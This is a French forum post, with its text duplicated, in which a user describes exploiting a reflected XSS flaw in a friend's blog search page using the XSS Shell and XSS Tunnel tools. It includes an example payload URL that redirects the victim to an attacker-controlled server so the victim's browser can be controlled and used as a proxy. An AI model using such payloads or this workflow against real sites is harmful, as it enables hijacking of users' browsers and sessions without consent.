Bonsoir à tous ! Ça fait un moment que je traine ici et je n'ai encore jamais rien posté, rien à dire d'intéressant qui n'est pas déjà été dit surement...
Alors j'ai découvert une utilisation assez surprenante des failles XSS (reflected pour ce cas), ça existe depuis quelques années mais je n'en avais jamais entendu parlé...
Pour moi une faille XSS sert juste a afficher un vieux alert('coucou') dans le browser de la cible ou au pire le renvoyer vers un script php voleur de cookies, mais en fait, non...
J'ai donc un ami blogueur qui a une faille xss dans son search.php (classique). En cherchant bien je suis tombé sur : XSS Shell
On installe et configure XSS Shell (que l'on trouve ici : https://github.com/portcullislabs/xssshell-xsstunnell)
C'est du .asp donc hosting sur IIS.
Une fois configuré, on envoi l'url à la victime (exemple : http://sitevulnerable.com/search.php?=<script>document.location='http://monserveur.com'</script>
La cible est donc connecté a xssshell et on peut lui envoyer tout un tas de requêtes prédéfinies ou tout ce qu'on veut du moment que ça soit en JavaScript.
Le seul problême c'est que quand la cible quitte son browser ou ferme l'onglet, la connexion est perdue.
C'est la qu'entre en jeu XSS Tunnel :
Ce petit soft se connecte au serveur et utilise la cible comme proxy, la connexion est maintenue même si la cible change de domaine
J'en suis encore à essayer de faire fonctionner XSS Tunnel, je n'apparait pas en tant que client, je pige pas trop pourquoi, bref...
En tout cas c'est vraiment très intéressant, si quelqu'un a déjà utiliser cette "technique" ou s'y connait un peu ça m’intéresserais d'avoir quelques retours ou avis ^^
Bonne soirée !
Alors j'ai découvert une utilisation assez surprenante des failles XSS (reflected pour ce cas), ça existe depuis quelques années mais je n'en avais jamais entendu parlé...
Pour moi une faille XSS sert juste a afficher un vieux alert('coucou') dans le browser de la cible ou au pire le renvoyer vers un script php voleur de cookies, mais en fait, non...
J'ai donc un ami blogueur qui a une faille xss dans son search.php (classique). En cherchant bien je suis tombé sur : XSS Shell
On installe et configure XSS Shell (que l'on trouve ici : https://github.com/portcullislabs/xssshell-xsstunnell)
C'est du .asp donc hosting sur IIS.
Une fois configuré, on envoi l'url à la victime (exemple : http://sitevulnerable.com/search.php?=<script>document.location='http://monserveur.com'</script>
La cible est donc connecté a xssshell et on peut lui envoyer tout un tas de requêtes prédéfinies ou tout ce qu'on veut du moment que ça soit en JavaScript.
Le seul problême c'est que quand la cible quitte son browser ou ferme l'onglet, la connexion est perdue.
C'est la qu'entre en jeu XSS Tunnel :
Ce petit soft se connecte au serveur et utilise la cible comme proxy, la connexion est maintenue même si la cible change de domaine
J'en suis encore à essayer de faire fonctionner XSS Tunnel, je n'apparait pas en tant que client, je pige pas trop pourquoi, bref...
En tout cas c'est vraiment très intéressant, si quelqu'un a déjà utiliser cette "technique" ou s'y connait un peu ça m’intéresserais d'avoir quelques retours ou avis ^^
Bonne soirée !
Commentaire